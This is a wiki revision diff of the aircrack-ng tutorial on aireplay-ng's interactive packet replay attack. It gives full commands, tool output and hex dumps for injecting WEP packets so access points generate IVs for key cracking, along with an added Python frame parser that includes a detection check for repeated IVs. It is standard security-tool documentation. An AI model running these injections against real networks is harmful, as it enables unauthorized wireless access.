interactive_packet_replay

interactive_packet_replay [2007/01/02 23:13]
gerald Ethereal has changed its name to Wireshark.
interactive_packet_replay [2010/11/21 09:05] (current)
sleek typos
 ====== Interactive packet replay ======
 +===== Description =====
 
-This attack allows you to choose a given packet for replaying; it sometimes gives more effective results than the [[ARP-request reinjection]] attack.
+This attack allows you to choose a specific packet for replaying (injecting). The attack can obtain packets to replay from two sources: a live flow of packets from your wireless card, or a pcap file. The standard pcap format (Packet CAPture, associated with the libpcap library, http://www.tcpdump.org) is recognized by most commercial and open-source traffic capture and analysis tools. Reading from a file is an often overlooked feature of aireplay-ng. It lets you reuse packets from other capture sessions, and various attacks generate pcap files for exactly this kind of reuse. A common use is reading a file containing a packet you created with [[packetforge-ng]].
 
-You could use it, for example, to attempt the "any data re-broadcast" attack, which only works if the AP actually reencrypts WEP data packets:
+In order to use the interactive packet replay successfully, it is important to understand a bit more about the wireless packet flow. You cannot simply capture and replay any packet. Only certain packets can be replayed successfully. Successfully means that the packet is accepted by the access point and causes a new initialization vector (IV) to be generated, since that is the whole objective.
 
-  aireplay-ng -2 -b 00:13:10:30:24:9C -n 100 -p 0841 -h 00:09:5B:EB:C5:2B -c FF:FF:FF:FF:FF:FF ath0
+To do this, we either have to select a packet which will naturally be successful, or manipulate a captured packet into a natural one. We will now explore these two concepts in more detail.
 
 +First, let's look at what characteristics a packet must have to naturally work. Access points will always repeat packets destined for the broadcast MAC address, FF:FF:FF:FF:FF:FF. ARP request packets have this characteristic. As well, the packet must be going from a wireless client to the wired network. This is a packet with the "To DS" (To Distribution System) bit flag set to 1.
 
-You can also use attack 2 to manually replay WEP-encrypted ARP request packets, whose size is either 68 or 86 bytes (depending on the operating system):
+So the aireplay-ng filter options we require to select these packets are:
 
-  aireplay-ng -2 -b 00:13:10:30:24:9C -d FF:FF:FF:FF:FF:FF -m 68 -n 68 -p 0841 -h 00:09:5B:EB:C5:2B ath0
+  * -b 00:14:6C:7E:40:80 selects packets with the MAC of the access point we are interested in
 +  * -d FF:FF:FF:FF:FF:FF selects packets with a broadcast destination
 +  * -t 1 selects packets with the "To Distribution System" flag set on
 
 +See "Natural Packet Replay" below for an example.
 
-  aireplay-ng -2 -b 00:13:10:30:24:9C -d FF:FF:FF:FF:FF:FF -m 86 -n 86 -p 0841 -h 00:09:5B:EB:C5:2B ath0
+Next, we will look at packets which need to be manipulated in order to be successfully replayed by the access point. The objective, as always, is to have the access point rebroadcast the packet you inject and generate a new IV. As simple as it sounds, the only selection criterion you need is "-t 1", selecting packets going to the distribution system (ethernet):
 +
 +  * -b 00:14:6C:7E:40:80 selects packets with the MAC of the access point we are interested in
 +  * -t 1 selects packets with the "To Distribution System" flag set on
 +
 +We don't care what the destination MAC address is, because in this case we will modify the packet being injected. The following options make the injected packet look like the "natural" packet described above:
 +
 +  * -p 0841 sets the Frame Control Field such that the packet looks like it is being sent from a wireless client to the access point, i.e. it sets the "To DS" field to 1.
 +  * -c FF:FF:FF:FF:FF:FF sets the destination MAC address to broadcast. This is required to cause the AP to replay the packet and thus generate the new IV.
 +
 +See "Modified Packet Replay" below for an example.
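The following Python is an added example for this page; it is not aircrack-ng code and not part of the original wiki text. It decodes, from the hex dumps aireplay-ng prints in the examples further down, the fields the description above talks about: the frame control word that -p overwrites (the dump's first two bytes, 0841 or 0842), the To DS / From DS bits that -t filters on, the three address fields whose meaning changes with those bits (which is why the dumps place BSSID, destination and source in different byte positions), and the WEP IV whose regeneration is the objective. replay_options() encodes the page's own selection rules, returning an empty list for a "natural" candidate and otherwise the -p/-c rewrites the text prescribes (for the "Modified Packet Replay" frame, which already carries 0841, only -c is listed; the page's command passes -p 0841 as well, which changes nothing there). The comments also map the type/subtype/WEP bits to the -u/-v/-w filters used in the management-frame section. repeated_ivs() is the defender's view of the same mechanism: the injector resends one frame unchanged, so the same transmitter and IV recur in a burst, which a wireless IDS can count. Function and constant names are mine; the sample frames are the page's dumps, and the repeated-frame burst is constructed.

```python
"""Decode the 802.11 header fields that aireplay-ng's interactive replay (-2)
filters on and rewrites, then apply this page's selection rules to frames.

Added example for this wiki page, not aircrack-ng code.  The sample frames are
copied from the hex dumps printed on the page (the *_HDR entries are the first
32 bytes of their dump); the burst handed to repeated_ivs() is constructed.
"""
from collections import Counter

BROADCAST = "ff:ff:ff:ff:ff:ff"
DATA = 2  # frame control "type" value for data frames (-u 2)


def _mac(b):
    return ":".join(f"{x:02x}" for x in b)


def parse_frame(raw):
    """Frame control flags, DS-dependent addresses and the WEP IV of a frame.

    Frame control is the first two bytes exactly as the dump prints them, so
    the value aireplay-ng takes for -p (0841, 0842) is simply raw[0:2]."""
    if len(raw) < 24:
        raise ValueError("shorter than an 802.11 data header")
    fc0, fc1 = raw[0], raw[1]
    f = {
        "fc": raw[:2].hex(),
        "type": (fc0 >> 2) & 0x3,       # -u filter: 0 mgmt, 1 ctrl, 2 data
        "subtype": fc0 >> 4,            # -v filter: 8 = beacon (type 0), 12 = CTS (type 1)
        "to_ds": bool(fc1 & 0x01),      # -t filter
        "from_ds": bool(fc1 & 0x02),
        "protected": bool(fc1 & 0x40),  # -w filter; the "(WEP)" in aireplay-ng's output
        "size": len(raw),               # -m / -n filters
    }
    a1, a2, a3 = _mac(raw[4:10]), _mac(raw[10:16]), _mac(raw[16:22])
    # The meaning of each address field depends on the To DS / From DS bits.
    if f["to_ds"] and not f["from_ds"]:        # client -> AP (the 0841 dumps)
        f.update(bssid=a1, src=a2, dst=a3)
    elif f["from_ds"] and not f["to_ds"]:      # AP -> client (the 0842 dumps)
        f.update(dst=a1, bssid=a2, src=a3)
    elif not f["to_ds"] and not f["from_ds"]:  # ad hoc
        f.update(dst=a1, src=a2, bssid=a3)
    else:                                      # WDS has four addresses; skipped here
        f.update(dst=a3, src=None, bssid=None)
        return f
    if f["protected"] and len(raw) >= 28:
        f["iv"] = raw[24:27].hex()      # 3-byte WEP IV follows the 24-byte header
        f["key_index"] = raw[27] >> 6   # key ID sits in the top two bits
    return f


def replay_options(raw):
    """This page's rules: [] for a "natural" candidate (protected data frame,
    To DS set, broadcast destination), else the -p / -c rewrites it needs."""
    f = parse_frame(raw)
    if f["type"] != DATA or not f["protected"]:
        raise ValueError("the technique on this page applies to WEP data frames")
    opts = []
    if f["fc"] != "0841":
        opts.append("-p 0841")                   # force To DS = 1, From DS = 0
    if f["dst"] != BROADCAST:
        opts.append(f"-c {BROADCAST.upper()}")  # APs always repeat broadcasts
    return opts


def repeated_ivs(frames, threshold=3):
    """Defender-side check: (transmitter, IV) pairs seen >= threshold times.
    An injector resends one chosen frame unchanged, so its IV recurs with every
    copy; a station encrypting fresh traffic uses a new IV for each frame."""
    seen = Counter()
    for raw in frames:
        f = parse_frame(raw)
        if f.get("iv"):
            seen[(f["src"], f["iv"])] += 1
    return {k: n for k, n in seen.items() if n >= threshold}


# Frames copied from the hex dumps on this page.
NATURAL_68 = bytes.fromhex(          # "Natural Packet Replay", all 68 bytes
    "0841de0000146c7e4080000fb5343030ffffffffffff4045d16ac8006f4fddef"
    "b488ad7c9f2a64f6ab04d3630efe41628ad92f7416bbabcf232e97ee5e45754d23e0883e")
ARP_86 = bytes.fromhex(              # WEP-encrypted ARP from the wired side, all 86 bytes
    "08420000ffffffffffff00146c7e40800040f477e5c99075a09c0000d697eb34"
    "e8809a378bdad0e7fdb4252dd235313c16ab784c5a45b147fba2fe90ae264c9d"
    "7d778b2f1c701d6b58f7b3ac9e7f7e4378edeeb36cc4")
UNICAST_TODS_HDR = bytes.fromhex(    # "Modified Packet Replay", header only
    "08412c0000146c7e4080000fb53430300040f477e5c990c93d798b00ce592bd7")
MCAST_FROMDS_HDR = bytes.fromhex(    # first of the "Other Examples", header only
    "0842000001005e0000fb00146c7e40800040f477e5c95065917f0000e053b683")

if __name__ == "__main__":
    for name, raw in [("natural", NATURAL_68), ("arp", ARP_86),
                      ("unicast", UNICAST_TODS_HDR), ("mcast", MCAST_FROMDS_HDR)]:
        f = parse_frame(raw)
        print(f"{name:8} fc={f['fc']} ToDS={f['to_ds']:d} FromDS={f['from_ds']:d} "
              f"dst={f['dst']} iv={f.get('iv')} -> {replay_options(raw) or 'natural'}")
    # Constructed burst: the same frame five times, as an injector would send it.
    print(repeated_ivs([NATURAL_68] * 5 + [ARP_86, UNICAST_TODS_HDR]))
```

Run it and compare the printed addresses with the BSSID / Dest. MAC / Source MAC lines aireplay-ng shows for the same dumps: the 0841 frames carry the BSSID first, the 0842 frames carry the destination first, and the IV is the three bytes right after the 24-byte header in both cases.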
 + 
 + 
 +===== Usage =====
 +
 +   aireplay-ng -2 <filter options> <replay options> -r <file name> <replay interface>
 +
 +Where:
 +
 +  * -2 means interactive replay attack
 +  * <filter options> are described [[aireplay-ng#usage|here]]
 +  * <replay options> are described [[aireplay-ng#usage|here]]
 +  * -r <file name> specifies a pcap file to read packets from (optional)
 +  * <replay interface> is the wireless interface, such as ath0
 + 
 +===== Usage Examples =====
 +
 +==== Natural Packet Replay ====
 +
 +For this example, you do not need to do a fake authentication first, since the source MAC address is already associated with the access point. The source MAC address is from the existing wireless client.
 +
 +Putting it all together:
 +
 +   aireplay-ng -2 -b 00:14:6C:7E:40:80 -d FF:FF:FF:FF:FF:FF -t 1 ath0
 +
 +Where:
 +
 +  * -2 means interactive replay
 +  * -b 00:14:6C:7E:40:80 selects packets with the MAC of the access point we are interested in
 +  * -d FF:FF:FF:FF:FF:FF selects packets with a broadcast destination
 +  * -t 1 selects packets with the "To Distribution System" flag set on
 +  * ath0 is the wireless interface
 +
 +When launched, the program will look as follows:
 +
 +   Read 4 packets...
 +    
 +        Size: 68, FromDS: 0, ToDS: 1 (WEP)
 +    
 +             BSSID  =  00:14:6C:7E:40:80
 +         Dest. MAC  =  FF:FF:FF:FF:FF:FF
 +        Source MAC  =  00:0F:B5:34:30:30
 +    
 +        0x0000:  0841 de00 0014 6c7e 4080 000f b534 3030  .A....l~@....400
 +        0x0010:  ffff ffff ffff 4045 d16a c800 6f4f ddef  ......@E.j..oO..
 +        0x0020:  b488 ad7c 9f2a 64f6 ab04 d363 0efe 4162  ...|.*d....c..Ab
 +        0x0030:  8ad9 2f74 16bb abcf 232e 97ee 5e45 754d  ../t....#...^EuM
 +        0x0040:  23e0 883e                                #..>
 +
 +   Use this packet ? y
 +
 +Notice that the packet matches our selection criteria. Enter "y" and it starts injecting:
 +
 +   Saving chosen packet in replay_src-0315-191310.cap
 +   You should also start airodump-ng to capture replies.
 +    
 +   Sent 773 packets...
 +
 + 
 +==== Modified Packet Replay ====
 +
 +For this example, you do not need to do a fake authentication first, since the source MAC address is already associated with the access point. The source MAC address is from the existing wireless client.
 +
 +Putting it all together:
 +
 +   aireplay-ng -2 -b 00:14:6C:7E:40:80 -t 1 -c FF:FF:FF:FF:FF:FF -p 0841 ath0
 +
 +Where:
 +
 +  * -2 means interactive replay
 +  * -b 00:14:6C:7E:40:80 selects packets with the MAC of the access point we are interested in
 +  * -t 1 selects packets with the "To Distribution System" flag set on
 +  * -c FF:FF:FF:FF:FF:FF sets the destination MAC address to broadcast. This is required to cause the AP to replay the packet and thus generate the new IV.
 +  * -p 0841 sets the Frame Control Field such that the packet looks like it is being sent from a wireless client, i.e. it sets the "To DS" field to 1.
 +  * ath0 is the wireless interface
 +
 +The IVs generated per second will vary based on the size of the packet you select. The smaller the packet size, the higher the rate per second. When launched, the program will look as follows:
 +
 +   Read 10 packets...
 +    
 +        Size: 124, FromDS: 0, ToDS: 1 (WEP)
 +    
 +             BSSID  =  00:14:6C:7E:40:80
 +         Dest. MAC  =  00:40:F4:77:E5:C9
 +        Source MAC  =  00:0F:B5:34:30:30
 +    
 +        0x0000:  0841 2c00 0014 6c7e 4080 000f b534 3030  .A,...l~@....400
 +        0x0010:  0040 f477 e5c9 90c9 3d79 8b00 ce59 2bd7  .@.w....=y...Y+.
 +        0x0020:  96e7 fadf e0de 2e99 c019 4f85 9508 3bcc  ..........O...;.
 +        0x0030:  8d18 dbd5 92a7 a711 87d8 58d3 02b3 7be7  ..........X...{.
 +        0x0040:  8bf1 69c0 c596 3bd1 436a 9598 762c 9d1d  ..i...;.Cj..v,..
 +        0x0050:  7a57 3f3d e13c dad0 f2d8 0e65 6d66 d913  zW?=.<.....emf..
 +        0x0060:  9716 84a0 6f9a 0c68 2b20 7f55 ba9a f825  ....o..h+ U...%
 +        0x0070:  bf22 960a 5c7b 3036 290a 89d6            ."..\{06)...
 +    
 +   Use this packet ? y
 +
 +Enter "y" and the program will continue:
 +
 +   Saving chosen packet in replay_src-0316-162802.cap
 +   You should also start airodump-ng to capture replies.
 +    
 +   Sent 2966 packets...
 + 
 + 
 +==== Other Examples ====
 +
 +You could use it, for example, to have the access point (AP) rebroadcast the packet and thereby generate new initialization vectors (IVs):
 +
 +   aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0
 +
 +Where:
 +
 +  * -2 means the interactive replay attack
 +  * -p 0841 sets the Frame Control Field such that the packet looks like it is being sent from a wireless client, i.e. it sets the "To DS" field to 1.
 +  * -c FF:FF:FF:FF:FF:FF sets the destination MAC address to broadcast. This is required to cause the AP to replay the packet and thus generate the new IV.
 +  * -b 00:14:6C:7E:40:80 is the MAC address of the access point (BSSID). This is a filter to select a single AP.
 +  * -h 00:0F:B5:88:AC:82 sets the source MAC address of the packets being transmitted; it should match your card's MAC address.
 +  * ath0 is the wireless interface name.
 +
 +IMPORTANT: In this example, we set the source MAC address of the packets. This MAC address must be associated with the AP either via fake authentication or an existing wireless client.
 +
 +The IVs generated per second will vary based on the size of the packet you select. The smaller the packet size, the higher the rate per second. When launched, the program will look as follows:
 +
 +   Read 99 packets...
 +    
 +        Size: 139, FromDS: 1, ToDS: 0 (WEP)
 +    
 +             BSSID  =  00:14:6C:7E:40:80
 +         Dest. MAC  =  01:00:5E:00:00:FB
 +        Source MAC  =  00:40:F4:77:E5:C9
 +    
 +        0x0000:  0842 0000 0100 5e00 00fb 0014 6c7e 4080  .B....^.....l~@.
 +        0x0010:  0040 f477 e5c9 5065 917f 0000 e053 b683  .@.w..Pe....S..
 +        0x0020:  fff3 795e 19a3 3313 b62c c9f3 c373 ef3e  ..y^..3..,...s.>
 +        0x0030:  87a0 751a 7d20 9e6c 59af 4d53 16d8 773c  ..u.} .lY.MS..w<
 +        0x0040:  af05 1021 8069 bbc8 06ea 59f3 3912 09a9  ...!.i....Y.9...
 +        0x0050:  c36d 1db5 a51e c627 11d1 d18c 2473 fae9  .m.....'....$s..
 +        0x0060:  84c0 7afa 8b84 ebbb e4d2 4763 44ae 69ea  ..z.......GcD.i.
 +        0x0070:  b65b df63 8893 279b 6ecf 1af8 c889 57f3  .[.c..'.n.....W.
 +        0x0080:  fea7 d663 21a6 3329 28c8 8f              ...c!.3)(..
 +    
 +   Use this packet ? 
 +
 +Responding "y" results in the packets being injected:
 +
 +   Saving chosen packet in replay_src-0303-103920.cap
 +   You should also start airodump-ng to capture replies.
 +    
 +   Sent 4772 packets...
 + 
 +By also including packet size filters you can use attack 2 to manually replay WEP-encrypted ARP request packets. ARP packets are typically either 68 (from a wireless client) or 86 (from a wired client) bytes:
 +
 +   aireplay-ng -2 -p 0841 -m 68 -n 86 -b 00:14:6C:7E:40:80 -c FF:FF:FF:FF:FF:FF -h 00:0F:B5:88:AC:82 ath0
 +
 +Where:
 +
 +  * -2 means the interactive replay attack
 +  * -p 0841 sets the Frame Control Field such that the packet looks like it is being sent from a wireless client, i.e. it sets the "To DS" field to 1.
 +  * -m 68 is the minimum packet length
 +  * -n 86 is the maximum packet length
 +  * -c FF:FF:FF:FF:FF:FF sets the destination MAC address to broadcast. This is required to cause the AP to replay the packet and thus generate the new IV.
 +  * -b 00:14:6C:7E:40:80 is the MAC address of the access point (BSSID). This is a filter to select a single AP.
 +  * -h 00:0F:B5:88:AC:82 sets the source MAC address of the packets being transmitted; it should match your card's MAC address.
 +  * ath0 is the wireless interface name.
 +
 +IMPORTANT: In this example, we set the source MAC address of the packets. This MAC address must be associated with the AP either via fake authentication or an existing wireless client.
 +
 +Once you start the program it looks as follows:
 +
 +   Read 145 packets...
 +    
 +        Size: 86, FromDS: 1, ToDS: 0 (WEP)
 +    
 +             BSSID  =  00:14:6C:7E:40:80
 +         Dest. MAC  =  FF:FF:FF:FF:FF:FF
 +        Source MAC  =  00:40:F4:77:E5:C9
 +    
 +        0x0000:  0842 0000 ffff ffff ffff 0014 6c7e 4080  .B..........l~@.
 +        0x0010:  0040 f477 e5c9 9075 a09c 0000 d697 eb34  .@.w...u.......4
 +        0x0020:  e880 9a37 8bda d0e7 fdb4 252d d235 313c  ...7......%-.51<
 +        0x0030:  16ab 784c 5a45 b147 fba2 fe90 ae26 4c9d  ..xLZE.G.....&L.
 +        0x0040:  7d77 8b2f 1c70 1d6b 58f7 b3ac 9e7f 7e43  }w./.p.kX....~C
 +        0x0050:  78ed eeb3 6cc4                           x...l.
 +    
 +   Use this packet ? y
 +
 +At this point, only respond "y" if the packet is 68 or 86 bytes long, otherwise enter "n". It now injects the packets:
 +
 +   Saving chosen packet in replay_src-0303-124624.cap
 +   You should also start airodump-ng to capture replies.
 + 
 +As mentioned earlier, aireplay-ng can be used to replay packets from a pcap file. Notice that in the previous example, aireplay-ng wrote a file called "replay_src-0303-124624.cap". You are not limited to using files written by aireplay-ng; you can use any pcap file from airodump-ng, kismet, etc.
 +
 +Here is an example using the output from the previous example:
 +
 +   aireplay-ng -2 -p 0841 -b 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 -r replay_src-0303-124624.cap ath0
 +
 +Where:
 +
 +  * -2 means the interactive replay attack
 +  * -p 0841 sets the Frame Control Field such that the packet looks like it is being sent from a wireless client, i.e. it sets the "To DS" field to 1.
 +  * -c FF:FF:FF:FF:FF:FF is not included here, because an ARP packet already has the destination MAC address set to broadcast.
 +  * -b 00:14:6C:7E:40:80 is the MAC address of the access point (BSSID). This is a filter to select a single AP.
 +  * -h 00:0F:B5:88:AC:82 sets the source MAC address of the packets being transmitted; it should match your card's MAC address.
 +  * ath0 is the wireless interface name.
 +
 +IMPORTANT: In this example, we set the source MAC address of the packets. This MAC address must be associated with the AP either via fake authentication or an existing wireless client.
 +
 +The program responds:
 +
 +        Size: 86, FromDS: 1, ToDS: 0 (WEP)
 +    
 +             BSSID  =  00:14:6C:7E:40:80
 +         Dest. MAC  =  FF:FF:FF:FF:FF:FF
 +        Source MAC  =  00:40:F4:77:E5:C9
 +    
 +        0x0000:  0842 0000 ffff ffff ffff 0014 6c7e 4080  .B..........l~@.
 +        0x0010:  0040 f477 e5c9 9075 a09c 0000 d697 eb34  .@.w...u.......4
 +        0x0020:  e880 9a37 8bda d0e7 fdb4 252d d235 313c  ...7......%-.51<
 +        0x0030:  16ab 784c 5a45 b147 fba2 fe90 ae26 4c9d  ..xLZE.G.....&L.
 +        0x0040:  7d77 8b2f 1c70 1d6b 58f7 b3ac 9e7f 7e43  }w./.p.kX....~C
 +        0x0050:  78ed eeb3 6cc4                           x...l.
 +    
 +   Use this packet ? y
 +
 +You then say "y" to select the packet. It then starts to inject the packets:
 +
 +   Saving chosen packet in replay_src-0303-124624.cap
 +   You should also start airodump-ng to capture replies.
 +    
 +   End of file.
 + 
 +===== Usage Tips =====
 +
 +==== Additional Interactive Application ====
 +
 +There are some interesting applications of the first example above. It can be used to attack networks without any connected wireless clients. Start the aireplay-ng attack per the example. Now sit back and wait for any packet to be broadcast. It does not matter what type. Just say "y" and bingo, you are generating IVs. The tradeoff is speed: big packets yield fewer IVs per second. The major advantage is that it saves the steps of obtaining the xor stream (chopchop or fragmentation attacks), building a packet and launching a replay attack.
 +
 +This would also work on APs with clients. It would be faster since you don't have to wait for an ARP; any packet will do.
 +
 +IMPORTANT: The source MAC address you use must first be associated with the AP via fake authentication.
 +
 +==== Injecting Management Frames ====
 +
 +You can also inject management and control frames on a per-frame basis with aireplay-ng. You just need to specify a matching filter, since the default one only allows WEP data packets.
 +
 +Examples:
 +  * Setting -v 8 -u 0 -w 0 allows you to send beacon frames.
 +  * Setting -v 12 -u 1 -w 0 -m 10 -n 2000 sets a filter for control frames (in this case clear-to-send frames).
 +
 +
 +===== Usage Troubleshooting =====
 +
 +The most common problem is that you are not associated with the AP. Either use the source MAC address of a client already associated with the AP or use [[fake authentication]].
 +
 +Check the [[i_am_injecting_but_the_ivs_don_t_increase|I am injecting but the IVs don't increase tutorial]].
 +
 +One situation that may affect interactive replay: "Exception of wireless client separation option", http://forum.aircrack-ng.org/index.php?topic=194
 +
 +Also see the general aireplay-ng troubleshooting ideas: [[aireplay-ng#usage_troubleshooting|aireplay-ng usage troubleshooting]].
 
-Another good idea is to capture some traffic and then have a look at it with [[http://www.wireshark.org/|Wireshark]]. If two packets look like a request and a response (one client sends a packet and a very short time later the receiver answers it), then it is a good idea to try to reinject the request packet to get answers.
interactive_packet_replay.1167776013.txt.gz · Last modified: 2007/01/02 23:13 (external edit)